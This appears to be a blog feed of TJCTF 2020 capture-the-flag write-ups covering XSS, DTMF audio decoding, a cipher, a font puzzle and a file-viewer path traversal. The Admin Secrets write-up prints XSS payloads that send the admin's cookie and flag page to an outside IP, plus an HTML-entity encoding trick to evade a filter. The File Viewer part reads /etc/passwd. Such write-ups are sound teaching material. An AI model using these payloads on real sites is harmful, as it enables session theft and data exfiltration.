Blog - nlegallhttps://blog.nlegall.fr/2020-06-02T00:00:00+02:00TJCTF20202020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020.html<p><em><a href="https://tjctf.org">TJCTF 2020</a> - <a href="https://ctftime.org/event/928">CTFTime</a></em></p>
<p>I finish 58th (868 people who mark at least 5 point) with 980 points.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/tjctf/2020/bilan.png"></p>
<h2>Cryptography</h2>
<ul>
<li><a href="/tjctf2020-circles.html">Circles</a></li>
<li><a href="/tjctf2020-is-this-crypto.html">Is This Crypto?</a></li>
<li><a href="/tjctf2020-rsabc.html">RSABC</a></li>
<li><a href="/tjctf2020-tap-dancing.html">Tap Dancing</a></li>
<li><a href="/tjctf2020-titanic.html">Titanic</a></li>
<li><a href="/tjctf2020-typewriter.html">Typewriter</a></li>
</ul>
<h2>Web</h2>
<ul>
<li><a href="/tjctf2020-admin-secrets.html">Admin Secrets</a></li>
<li><a href="/tjctf2020-file-viewer.html">File Viewer</a></li>
<li><a href="/tjctf2020-login.html">Login</a></li>
<li><a href="/tjctf2020-moar-horse-4.html">Moar Horse 4</a></li>
<li><a href="/tjctf2020-sarah-palin-fanpage.html">Sarah Palin Fanpage</a></li>
<li><a href="/tjctf2020-weak-password.html">Weak Password</a></li>
</ul>
<h2>Reverse</h2>
<ul>
<li><a href="/tjctf2020-chord-encoder.html">Chord Encoder</a></li>
<li><a href="/tjctf2020-gym.html">Gym</a></li>
</ul>
<h2>Forensics</h2>
<ul>
<li><a href="/tjctf2020-hexillology.html">Hexillology</a></li>
<li><a href="/rtcp-basmati-rice-64.html">BASmati ricE 64 …</a></li></ul><p><em><a href="https://tjctf.org">TJCTF 2020</a> - <a href="https://ctftime.org/event/928">CTFTime</a></em></p>
<p>I finish 58th (868 people who mark at least 5 point) with 980 points.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/tjctf/2020/bilan.png"></p>
<h2>Cryptography</h2>
<ul>
<li><a href="/tjctf2020-circles.html">Circles</a></li>
<li><a href="/tjctf2020-is-this-crypto.html">Is This Crypto?</a></li>
<li><a href="/tjctf2020-rsabc.html">RSABC</a></li>
<li><a href="/tjctf2020-tap-dancing.html">Tap Dancing</a></li>
<li><a href="/tjctf2020-titanic.html">Titanic</a></li>
<li><a href="/tjctf2020-typewriter.html">Typewriter</a></li>
</ul>
<h2>Web</h2>
<ul>
<li><a href="/tjctf2020-admin-secrets.html">Admin Secrets</a></li>
<li><a href="/tjctf2020-file-viewer.html">File Viewer</a></li>
<li><a href="/tjctf2020-login.html">Login</a></li>
<li><a href="/tjctf2020-moar-horse-4.html">Moar Horse 4</a></li>
<li><a href="/tjctf2020-sarah-palin-fanpage.html">Sarah Palin Fanpage</a></li>
<li><a href="/tjctf2020-weak-password.html">Weak Password</a></li>
</ul>
<h2>Reverse</h2>
<ul>
<li><a href="/tjctf2020-chord-encoder.html">Chord Encoder</a></li>
<li><a href="/tjctf2020-gym.html">Gym</a></li>
</ul>
<h2>Forensics</h2>
<ul>
<li><a href="/tjctf2020-hexillology.html">Hexillology</a></li>
<li><a href="/rtcp-basmati-rice-64.html">BASmati ricE 64</a></li>
<li><a href="/tjctf2020-ling-ling.html">Ling Ling</a></li>
<li><a href="/tjctf2020-rap-god.html">Rap God</a></li>
</ul>
<h2>Misc</h2>
<ul>
<li><a href="/tjctf2020-arabfunny.html">arabfunny</a></li>
<li><a href="/tjctf2020-censorship.html">Censorship</a></li>
<li><a href="#">Gamer W - soon</a></li>
<li><a href="/tjctf2020-zipped-up.html">Zipped Up</a></li>
</ul>TJCTF2020 - Admin Secrets2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-admin-secrets.html<p><em>solves : 72</em></p>
<div class="highlight"><pre><span></span><code>Points: 100
Written by avz92
See if you can get the flag from the admin at this website!
Hint: The admin can see something you can't. Check the page source.
</code></pre></div>
<p>After create a new account, we can create a text to share it with everyone.</p>
<p><img alt="admin_secrets.png" src="https://blog.nlegall.fr/images/tjctf/2020/admin_secrets.png"></p>
<p>It's like …</p><p><em>solves : 72</em></p>
<div class="highlight"><pre><span></span><code>Points: 100
Written by avz92
See if you can get the flag from the admin at this website!
Hint: The admin can see something you can't. Check the page source.
</code></pre></div>
<p>After create a new account, we can create a text to share it with everyone.</p>
<p><img alt="admin_secrets.png" src="https://blog.nlegall.fr/images/tjctf/2020/admin_secrets.png"></p>
<p>It's like basic user input that can be exploit with XXS attack.</p>
<p>Let's ckeck if it's vunlerable with some basic XSS code. We can get the admin cookie with the following code:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'DOMContentLoaded'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(){</span><span class="k">new</span> <span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">"http://x.x.x.x/cookie.php?c="</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;},</span> <span class="kc">false</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
</code></pre></div>
<p>We send our text and click on the admin button. We check our server log and check if we have any request:</p>
<div class="highlight"><pre><span></span><code>"GET /cookie.php?c=hint=%22Check%20the%20admin%20console!\x5C012%22 HTTP/1.1"
</code></pre></div>
<p>Perfect! We have a fonction XSS form. We have to figure out where is the flag.</p>
<p>The admin from the cookie we got earlier gave us a hint: <code>"Check the admin console!"</code>. Maybe we can get something else if we have access to the admin console code.</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'DOMContentLoaded'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(){</span><span class="k">new</span> <span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">"http://x.x.x.x/cookie.php?c="</span><span class="o">+</span><span class="nx">$</span><span class="p">(</span><span class="s1">'.admin_console'</span><span class="p">).</span><span class="nx">children</span><span class="p">().</span><span class="nx">html</span><span class="p">();},</span> <span class="kc">false</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>"GET /cookie.php?c=%3Cbutton%20class=%22btn%20btn-primary%20flag-button%22%3EAccess%20Flag%3C/button%3E HTTP/1.1"
</code></pre></div>
<p>As decode, we have: <code><button class="btn btn-primary flag-button">Access Flag</button></code>. Great! We can access the flag if we click on the button. But before, it's good to check if there is no JS function associate with the trigger. We can use <a href="https://github.com/ruidfigueiredo/findHandlersJS/blob/master/findEventHandlers.js">findHandlersJS</a> code to log the event as before and get the code.</p>
<div class="highlight"><pre><span></span><code>"GET /?c=function(e){%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20$.ajax({%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20type:%20%22GET%22,%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20url:%20%22/admin_flag%22,%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20success:%20function(resp)%20{%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20flag=resp;$(%22 HTTP/1.1"
</code></pre></div>
<p>We have a start of AJAX function:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
<span class="nx">$</span><span class="p">.</span><span class="nx">ajax</span><span class="p">({</span>
<span class="nx">type</span><span class="o">:</span> <span class="s2">"GET"</span><span class="p">,</span>
<span class="nx">url</span><span class="o">:</span> <span class="s2">"/admin_flag"</span><span class="p">,</span>
<span class="nx">success</span><span class="o">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">resp</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">flag</span><span class="o">=</span><span class="nx">resp</span><span class="p">;</span><span class="nx">$</span><span class="p">(</span>
<span class="sb">````</span>
<span class="nx">So</span><span class="p">.</span> <span class="nx">The</span> <span class="nx">flag</span> <span class="nx">is</span> <span class="nx">read</span> <span class="nx">from</span> <span class="nx">the</span> <span class="nx">page</span> <span class="sb">`admin_flag`</span> <span class="p">(</span><span class="nx">tried</span> <span class="nx">to</span> <span class="nx">access</span> <span class="kd">with</span> <span class="nx">curl</span> <span class="nx">or</span> <span class="nx">browser</span> <span class="nx">but</span> <span class="nx">denied</span> <span class="o">^^</span><span class="p">).</span>
<span class="nx">We</span> <span class="nx">need</span> <span class="nx">the</span> <span class="nx">admin</span> <span class="nx">to</span> <span class="nx">perform</span> <span class="nx">the</span> <span class="nx">action</span> <span class="k">for</span> <span class="nx">us</span><span class="p">.</span> <span class="nx">We</span> <span class="nx">can</span> <span class="nx">replace</span> <span class="nx">the</span> <span class="nx">previous</span> <span class="nx">XSS</span> <span class="nx">code</span> <span class="kd">with</span> <span class="nx">a</span> <span class="nx">AJAX</span> <span class="nx">get</span> <span class="nx">who</span> <span class="nx">will</span> <span class="nx">make</span> <span class="nx">a</span> <span class="nx">request</span> <span class="kd">with</span> <span class="nx">the</span> <span class="nx">result</span><span class="p">.</span>
<span class="sb">```html</span>
<span class="sb"><IMG SRC=/ onerror="</span>
<span class="sb">document.addEventListener('DOMContentLoaded', function(){</span>
<span class="sb">$.ajax({</span>
<span class="sb"> type: 'GET',</span>
<span class="sb"> url: '/admin_flag',</span>
<span class="sb"> success: function(resp) {</span>
<span class="sb"> new Image().src='http://51.159.35.66/?c='+resp;</span>
<span class="sb"> }</span>
<span class="sb"> });</span>
<span class="sb">});"></img></span>
</code></pre></div>
<p>Submit the form, and click again to the button.</p>
<div class="highlight"><pre><span></span><code>/?c=This%20post%20contains%20unsafe%20content.%20To%20prevent%20unauthorized%20access,%20the%20flag%20cannot%20be%20accessed%20for%20the%20following%20violations:%20Script%20tags%20found.%20Single%20quote%20found.%20Double%20quote%20found.%20Parenthesis%20found.
</code></pre></div>
<p>Hum. It works but got spotted by the filter. Let's encode the JS code with html-entities (https://mothereff.in/html-entities):</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">IMG</span> <span class="na">SRC</span><span class="o">=</span><span class="s">/</span> <span class="na">onerror</span><span class="o">=</span><span class="s">&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x61;&#x64;&#x64;&#x45;&#x76;&#x65;&#x6E;&#x74;&#x4C;&#x69;&#x73;&#x74;&#x65;&#x6E;&#x65;&#x72;&#x28;&#x27;&#x44;&#x4F;&#x4D;&#x43;&#x6F;&#x6E;&#x74;&#x65;&#x6E;&#x74;&#x4C;&#x6F;&#x61;&#x64;&#x65;&#x64;&#x27;&#x2C;&#x20;&#x66;&#x75;&#x6E;&#x63;&#x74;&#x69;&#x6F;&#x6E;&#x28;&#x29;&#x7B;&#xA;&#x24;&#x2E;&#x61;&#x6A;&#x61;&#x78;&#x28;&#x7B;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x74;&#x79;&#x70;&#x65;&#x3A;&#x20;&#x27;&#x47;&#x45;&#x54;&#x27;&#x2C;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x75;&#x72;&#x6C;&#x3A;&#x20;&#x27;&#x2F;&#x61;&#x64;&#x6D;&#x69;&#x6E;&#x5F;&#x66;&#x6C;&#x61;&#x67;&#x27;&#x2C;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x73;&#x75;&#x63;&#x63;&#x65;&#x73;&#x73;&#x3A;&#x20;&#x66;&#x75;&#x6E;&#x63;&#x74;&#x69;&#x6F;&#x6E;&#x28;&#x72;&#x65;&#x73;&#x70;&#x29;&#x20;&#x7B;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x6E;&#x65;&#x77;&#x20;&#x49;&#x6D;&#x61;&#x67;&#x65;&#x28;&#x29;&#x2E;&#x73;&#x72;&#x63;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x35;&#x31;&#x2E;&#x31;&#x35;&#x39;&#x2E;&#x33;&#x35;&#x2E;&#x36;&#x36;&#x2F;&#x3F;&#x63;&#x3D;&#x27;&#x2B;&#x72;&#x65;&#x73;&#x70;&#x3B;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x7D;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x7D;&#x29;&#x3B;&#xA;&#x7D;&#x29;&#x3B;</span><span class="p">></</span><span class="nt">img</span><span class="p">></span>
</code></pre></div>
<p>Submit again. Click the button. And VICTORY!</p>
<div class="highlight"><pre><span></span><code>"GET /?c=tjctf{st0p_st3aling_th3_ADm1ns_fl4gs} HTTP/1.1"
</code></pre></div>TJCTF2020 - arabfunny2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-arabfunny.html<p><em>solves : 67</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by jpes707
So many sounds...
Hint: Listen to all the sounds. Which sound could possibly be used to encode a message?
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/449acd6124ee789182ced8c03a0a50664bdbe2bd22669455fceeca8acec9b718_arabfunny.mp3">arabfunny.mp3</a></p>
<p>We have a strange mp3 file with a lot of different sounds and we need to find the one.</p>
<p>Around 1:02 …</p><p><em>solves : 67</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by jpes707
So many sounds...
Hint: Listen to all the sounds. Which sound could possibly be used to encode a message?
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/449acd6124ee789182ced8c03a0a50664bdbe2bd22669455fceeca8acec9b718_arabfunny.mp3">arabfunny.mp3</a></p>
<p>We have a strange mp3 file with a lot of different sounds and we need to find the one.</p>
<p>Around 1:02, we got a lot of sound that looks like phone tone. After some searchs, I found that this phone use <a href="https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling">DTMF</a> to encode each phone key input.</p>
<p>We can now isolate the sound from 1:02 up to 1:20 to get only this sound. We need now to find a tool that can read the audio and give us back the phone key stroke.</p>
<p>I tried like phone application but not working since the sound was to noisy. I finnaly found one that can read directly from the audio file: <a href="https://github.com/EliasOenal/multimon-ng">multimon-ng</a>.</p>
<div class="highlight"><pre><span></span><code>╰─ multimon-ng -t wav -a DTMF /home/nlegall/ctf/tjctf/untitled.wav
multimon-ng <span class="m">1</span>.1.8
<span class="o">(</span>C<span class="o">)</span> <span class="m">1996</span>/1997 by Tom Sailer HB9JNX/AE4WA
<span class="o">(</span>C<span class="o">)</span> <span class="m">2012</span>-2019 by Elias Oenal
Available demodulators: POCSAG512 POCSAG1200 POCSAG2400 FLEX EAS UFSK1200 CLIPFSK FMSFSK AFSK1200 AFSK2400 AFSK2400_2 AFSK2400_3 HAPN4800 FSK9600 DTMF ZVEI1 ZVEI2 ZVEI3 DZVEI PZVEI EEA EIA CCIR MORSE_CW DUMPCSV X10 SCOPE
Enabled demodulators: DTMF
DTMF: <span class="m">1</span>
DTMF: <span class="m">1</span>
<span class="o">[</span>...<span class="o">]</span>
DTMF: <span class="m">2</span>
DTMF: <span class="m">5</span>
</code></pre></div>
<p>The output is: <code>1116106009991161002212330098111411710400955009990977771091011100880950500055204881122125</code>. Seems we have a lot of repetions. Let's check the number back and fix it: <code>116106099116102123098114117104095099097109101108095050052048112125</code>.</p>
<p>The result seems to be ascii encoded. I made a quick loop to decode it with python:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">c</span> <span class="o">=</span> <span class="s2">"116106099116102123098114117104095099097109101108095050052048112125"</span>
<span class="o">>>></span> <span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="o">>>></span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">23</span><span class="p">):</span>
<span class="o">...</span> <span class="n">flag</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">c</span><span class="p">[</span><span class="n">x</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">-</span> <span class="mi">3</span><span class="p">]</span> <span class="o">+</span> <span class="n">c</span><span class="p">[</span><span class="n">x</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">-</span> <span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">c</span><span class="p">[</span><span class="n">x</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]))</span>
<span class="o">...</span>
<span class="o">>>></span> <span class="n">flag</span>
<span class="s1">'tjctf</span><span class="si">{bruh_camel_240p}</span><span class="s1">'</span>
</code></pre></div>TJCTF2020 - Censorship2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-censorship.html<p><em>solves : 269</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by avz92
My friend has some top-secret government intel. He left a message, but the government censored him! They didn't want the information to be leaked, but can you find out what he was trying to say?
nc p1.tjctf.org 8003
</code></pre></div>
<p>Ok, no …</p><p><em>solves : 269</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by avz92
My friend has some top-secret government intel. He left a message, but the government censored him! They didn't want the information to be leaked, but can you find out what he was trying to say?
nc p1.tjctf.org 8003
</code></pre></div>
<p>Ok, no other clue, so let's try the command.</p>
<div class="highlight"><pre><span></span><code>╰─ nc p1.tjctf.org <span class="m">8003</span>
To prove you are worthy of this information, what is <span class="m">10</span> + <span class="m">5</span>?
<span class="m">15</span>
tjctf<span class="o">{[</span>CENSORED<span class="o">]}</span>
</code></pre></div>
<p>Hum, we have the flag but with the censorship. Let's try to pipe the output of the command:</p>
<div class="highlight"><pre><span></span><code>╰─ nc p1.tjctf.org <span class="m">8003</span> <span class="p">|</span> more
To prove you are worthy of this information, what is <span class="m">4</span> + <span class="m">6</span>?
tjctf<span class="o">{</span>TH3_1llum1n4ti_I5_R3aL<span class="o">}</span>
</code></pre></div>
<p>Magic! The flag appears and stay without the censorship!</p>TJCTF2020 - Chord Encoder2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-chord-encoder.html<p><em>solves : 228</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by boomo
I tried creating my own chords, but my encoded sheet music is a little hard to read. Please play me my song!
chord_encoder.py
Hint: Pathfinding? I just need some sick jams B)
</code></pre></div>
<p>We have three files:</p>
<ul>
<li>chors to number</li>
</ul>
<div class="highlight"><pre><span></span><code>A 0112
B …</code></pre></div><p><em>solves : 228</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by boomo
I tried creating my own chords, but my encoded sheet music is a little hard to read. Please play me my song!
chord_encoder.py
Hint: Pathfinding? I just need some sick jams B)
</code></pre></div>
<p>We have three files:</p>
<ul>
<li>chors to number</li>
</ul>
<div class="highlight"><pre><span></span><code>A 0112
B 2110
C 1012
D 020
E 0200
F 1121
G 001
a 0122
b 2100
c 1002
d 010
e 0100
f 1011
g 000
</code></pre></div>
<ul>
<li>the encoder</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'song.txt'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="n">l</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'1'</span><span class="p">:</span><span class="s1">'A'</span><span class="p">,</span> <span class="s1">'2'</span><span class="p">:</span><span class="s1">'B'</span><span class="p">,</span> <span class="s1">'3'</span><span class="p">:</span><span class="s1">'C'</span><span class="p">,</span> <span class="s1">'4'</span><span class="p">:</span><span class="s1">'D'</span><span class="p">,</span> <span class="s1">'5'</span><span class="p">:</span><span class="s1">'E'</span><span class="p">,</span> <span class="s1">'6'</span><span class="p">:</span><span class="s1">'F'</span><span class="p">,</span> <span class="s1">'7'</span><span class="p">:</span><span class="s1">'G'</span><span class="p">}</span>
<span class="n">chords</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'chords.txt'</span><span class="p">)</span><span class="o">.</span><span class="n">readlines</span><span class="p">():</span>
<span class="n">c</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">i</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">()</span>
<span class="n">chords</span><span class="p">[</span><span class="n">c</span><span class="p">]</span> <span class="o">=</span> <span class="n">n</span>
<span class="n">s</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">f</span><span class="p">:</span>
<span class="n">c1</span><span class="p">,</span> <span class="n">c2</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">i</span><span class="p">))[</span><span class="mi">2</span><span class="p">:]</span>
<span class="k">if</span> <span class="n">c1</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
<span class="n">c1</span> <span class="o">=</span> <span class="n">l</span><span class="p">[</span><span class="n">c1</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c2</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
<span class="n">c2</span> <span class="o">=</span> <span class="n">l</span><span class="p">[</span><span class="n">c2</span><span class="p">]</span>
<span class="n">s</span> <span class="o">+=</span> <span class="n">chords</span><span class="p">[</span><span class="n">c1</span><span class="p">]</span> <span class="o">+</span> <span class="n">chords</span><span class="p">[</span><span class="n">c2</span><span class="p">]</span>
<span class="nb">open</span><span class="p">(</span><span class="s1">'notes.txt'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
</code></pre></div>
<ul>
<li>cipher text</li>
</ul>
<div class="highlight"><pre><span></span><code>1121112111211002112101121121001001210000101221121011200102000110120200101100100111211011001020020010111012011202001011112110121121011211211002112110020200101111210112020010111121010112102001121100211211011020020001010
</code></pre></div>
<p>Ok, we don't know the clear text but how to generate the encoded output. So, we can do it for each printable characters:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">string</span>
<span class="n">l</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'1'</span><span class="p">:</span><span class="s1">'A'</span><span class="p">,</span> <span class="s1">'2'</span><span class="p">:</span><span class="s1">'B'</span><span class="p">,</span> <span class="s1">'3'</span><span class="p">:</span><span class="s1">'C'</span><span class="p">,</span> <span class="s1">'4'</span><span class="p">:</span><span class="s1">'D'</span><span class="p">,</span> <span class="s1">'5'</span><span class="p">:</span><span class="s1">'E'</span><span class="p">,</span> <span class="s1">'6'</span><span class="p">:</span><span class="s1">'F'</span><span class="p">,</span> <span class="s1">'7'</span><span class="p">:</span><span class="s1">'G'</span><span class="p">}</span>
<span class="n">chords</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'chords.txt'</span><span class="p">)</span><span class="o">.</span><span class="n">readlines</span><span class="p">():</span>
<span class="n">c</span><span class="p">,</span> <span class="n">n</span> <span class="o">=</span> <span class="n">i</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">()</span>
<span class="n">chords</span><span class="p">[</span><span class="n">c</span><span class="p">]</span> <span class="o">=</span> <span class="n">n</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">printable</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">c1</span><span class="p">,</span> <span class="n">c2</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">i</span><span class="p">))[</span><span class="mi">2</span><span class="p">:]</span>
<span class="k">if</span> <span class="n">c1</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
<span class="n">c1</span> <span class="o">=</span> <span class="n">l</span><span class="p">[</span><span class="n">c1</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c2</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
<span class="n">c2</span> <span class="o">=</span> <span class="n">l</span><span class="p">[</span><span class="n">c2</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">chords</span><span class="p">[</span><span class="n">c1</span><span class="p">]</span><span class="o">+</span><span class="n">chords</span><span class="p">[</span><span class="n">c2</span><span class="p">])</span> <span class="c1">## print all possible combinations</span>
<span class="n">decode</span><span class="p">[</span><span class="n">chords</span><span class="p">[</span><span class="n">c1</span><span class="p">]</span><span class="o">+</span><span class="n">chords</span><span class="p">[</span><span class="n">c2</span><span class="p">]]</span> <span class="o">=</span> <span class="n">i</span>
<span class="k">except</span><span class="p">:</span>
<span class="nb">int</span><span class="p">()</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>╰─ python a.py > correspondances.txt
╰─ cat correspondances.txt
<span class="m">1</span> <span class="m">10120112</span>
<span class="m">2</span> <span class="m">10122110</span>
<span class="m">3</span> <span class="m">10121012</span>
<span class="o">[</span>...<span class="o">]</span>
<span class="o">}</span> <span class="m">001010</span>
~ <span class="m">0010100</span>
</code></pre></div>
<p>And now, replace each result with the clear char and recover the flag: <code>flag{zats_wot_1_call_a_meloD}</code>.</p>TJCTF2020 - Circles2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-circles.html<p><em>solves : 261</em></p>
<div class="highlight"><pre><span></span><code>Points: 10
Written by jpes707
Some typefaces are mysterious, like this one - its origins are an enigma wrapped within a riddle, indeed.
Hint: To obtain the flag, you should find the font that was used to encode the message in the picture. If you Google the description of …</code></pre></div><p><em>solves : 261</em></p>
<div class="highlight"><pre><span></span><code>Points: 10
Written by jpes707
Some typefaces are mysterious, like this one - its origins are an enigma wrapped within a riddle, indeed.
Hint: To obtain the flag, you should find the font that was used to encode the message in the picture. If you Google the description of the problem, the first website that pops up seems promising. Using a dictionary to guess/bruteforce words without finding the font will not help you. Each circle in the image represents an alphanumeric character that is part of the flag. The brackets and the underscore in the image are NOT part of the font used to encrypt the flag.
</code></pre></div>
<p>We have a picture with circles.</p>
<p><img alt="circles.png" src="https://blog.nlegall.fr/files/tjctf/2020/f5e809c4c49f2c7d607d77c99f07bbd8e9b46dfbe61779201f5b185ed6642de3_Circles.png"></p>
<p>We know its from a specif font. After some searchs, we found the name: <code>USF Circular Designs</code>.</p>
<p>We can use this website to preview all letters and numbers (<code>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789</code>) and make the correspondences: <a href="https://www.fonts.com/font/ultimate-symbol/usf-circular-designs/regular">www.fonts.com</a>.</p>
<p>We decode the image and got the flag: <code>tjctf{B3auT1ful_f0Nt}</code>.</p>TJCTF2020 - File Viewer2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-file-viewer.html<p><em>solves : 257</em></p>
<div class="highlight"><pre><span></span><code>Points: 70
Written by saisree
So I've been developing this really cool site where you can read text files! It's still in beta mode, though, so there's only six files you can read.
Hint: The flag is in one directory somewhere on the server, all …</code></pre></div><p><em>solves : 257</em></p>
<div class="highlight"><pre><span></span><code>Points: 70
Written by saisree
So I've been developing this really cool site where you can read text files! It's still in beta mode, though, so there's only six files you can read.
Hint: The flag is in one directory somewhere on the server, all you have to do is find it...Oh wait. You don't have a shell, do you?
</code></pre></div>
<p>Start with visit the website:</p>
<p><img alt="fileviewer.png" src="https://blog.nlegall.fr/images/tjctf/2020/fileviewer.png"></p>
<p>If you click on a link, we can see the url become: <code>http://file_viewer.tjctf.org/reader.php?file=apple.txt</code>. It shows the content.</p>
<p>Let's try to read maybe another file like <code>/etc/passwd</code>: <code>http://file_viewer.tjctf.org/reader.php?file=/etc/passwd</code> </p>
<p><img alt="fileviewer_passwd.png" src="https://blog.nlegall.fr/images/tjctf/2020/fileviewer_passwd.png"></p>
